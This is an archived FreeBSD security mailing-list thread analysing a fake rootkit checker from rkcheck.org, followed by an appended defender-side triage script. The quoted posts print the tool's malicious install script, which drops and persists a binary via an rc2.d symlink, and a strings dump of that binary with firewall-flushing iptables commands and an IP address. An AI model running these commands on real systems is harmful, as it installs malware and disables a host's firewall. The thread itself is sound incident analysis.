Date: Fri, 27 Feb 2015 02:40:05 +1100 (EST)
From: Ian Smith <smithi@nimnet.asn.au>
To: Christopher Schulte <christopher@schulte.org>
Cc: Joseph Mingrone <jrm@ftfl.ca>, "freebsd-security@freebsd.org" <freebsd-security@freebsd.org>, Philip Jocks <pjlists@netzkommune.com>
Subject: Re: has my 10.1-RELEASE system been compromised
Message-ID: <20150227022821.P38620@sola.nimnet.asn.au>
In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote:

> > On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists@netzkommune.com> wrote:
> >
> > it felt pretty scammy to me, googling for the "worm" got me to
> > rkcheck.org which was registered a few days ago and looks like a
> > tampered version of chkrootkit. I hope nobody installed it anywhere,
> > it seems to execute rkcheck/tests/.unit/test.sh which contains
> >
> > #!/bin/bash
> >
> > cp tests/.unit/test /usr/bin/rrsyncn
> > chmod +x /usr/bin/rrsyncn
> > rm -fr /etc/rc2.d/S98rsyncn
> > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> > /usr/bin/rrsyncn
> > exit
> >
> > That doesn't look like something you'd want on your box…
>
> I filed a report with Google about that domain (Google Safe
> Browsing), briefly describing what's been recounted here on this
> thread. It seems quite suspicious, agreed.
>
> Has anyone started an analysis of the rrsyncn binary? The last few
> lines of a simple string dump are interesting… take note what looks
> to be an IP address of 95.215.44.195.
>
> /bin/sh
> iptables -X 2> /dev/null
> iptables -F 2> /dev/null
> iptables -t nat -F 2> /dev/null
> iptables -t nat -X 2> /dev/null
> iptables -t mangle -F 2> /dev/null
> iptables -t mangle -X 2> /dev/null
> iptables -P INPUT ACCEPT 2> /dev/null
> iptables -P FORWARD ACCEPT 2> /dev/null
> iptables -P OUTPUT ACCEPT 2> /dev/null
> udevd
> 95.215.44.195
> ;*3$"
>
> > Cheers,
> >
> > Philip
>
> Chris

Seeing as no one's mentioned it yet .. if your (linux) box were running
iptables - a reasonable assumption - then running those commands would
remove and flush all your rules, leaving you with a firewall that
accepted everything, as good as no firewall at all. And then .. ?

At least FreeBSD isn't the lowest hanging fruit for these monkeys ..
cheers, Ian


Date: Thu, 26 Feb 2015 12:02:52 -0600
From: Mark Felder <feld@FreeBSD.org>
To: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Message-Id: <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com>
In-Reply-To: <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl>
References: <864mq9zsmm.fsf@gly.ftfl.ca> <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl>

On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote:
>
> Example:
> # touch -t 201501010000 foo
> # find / -user www -newer foo
>
> If you don’t find anything, look back a little further.
> Hopefully you will find a clue in this way.
>

Thanks for posting this trick -- I've never considered it before and will
certainly put it in my toolbox!
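The two checks this thread describes, as an added defender-side helper that is not part of any post above: Walter Hop's touch/find -newer trick, generalised to any root directory, cutoff and optional owner, and a lookup for the persistence artifacts named in the quoted rkcheck script (/usr/bin/rrsyncn and the /etc/rc2.d/S98rsyncn link). The function names, the ROOT prefix argument (so a disk image mounted elsewhere can be examined too) and the use of a temporary reference file are my assumptions; only POSIX find, touch and mktemp are required.

```shell
#!/bin/sh
# Added triage helper, not from the thread. Assumes POSIX find/touch/mktemp.

# newer_than ROOT YYYYMMDDhhmm [USER]
# Prints every path under ROOT whose mtime is later than the cutoff,
# optionally only those owned by USER (e.g. the web server account).
# This is the touch -t / find -newer trick from the thread; to widen the
# search, call it again with an earlier cutoff.
newer_than() {
    root=$1; cutoff=$2; user=$3
    ref=$(mktemp) || return 1
    touch -t "$cutoff" "$ref"          # reference file carrying the cutoff mtime
    if [ -n "$user" ]; then
        find "$root" -user "$user" -newer "$ref"
    else
        find "$root" -newer "$ref"
    fi
    rm -f "$ref"
}

# rkcheck_indicators [ROOT]
# Looks for the files the tampered rkcheck's test.sh drops, under an optional
# ROOT prefix (empty = the live system).  Prints each one found and returns
# 1 if any is present, 0 if none is (a dangling symlink still counts).
rkcheck_indicators() {
    root=${1:-}
    found=0
    for p in /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn; do
        if [ -e "$root$p" ] || [ -L "$root$p" ]; then
            echo "indicator present: $root$p"
            found=1
        fi
    done
    return $found
}

# Example use on a live host:
#   newer_than / 201501010000 www
#   rkcheck_indicators && echo "no rkcheck artifacts found"
```

On a live host the first call walks the whole filesystem, so run it as root and expect the directory entries whose mtime changed as well as the files.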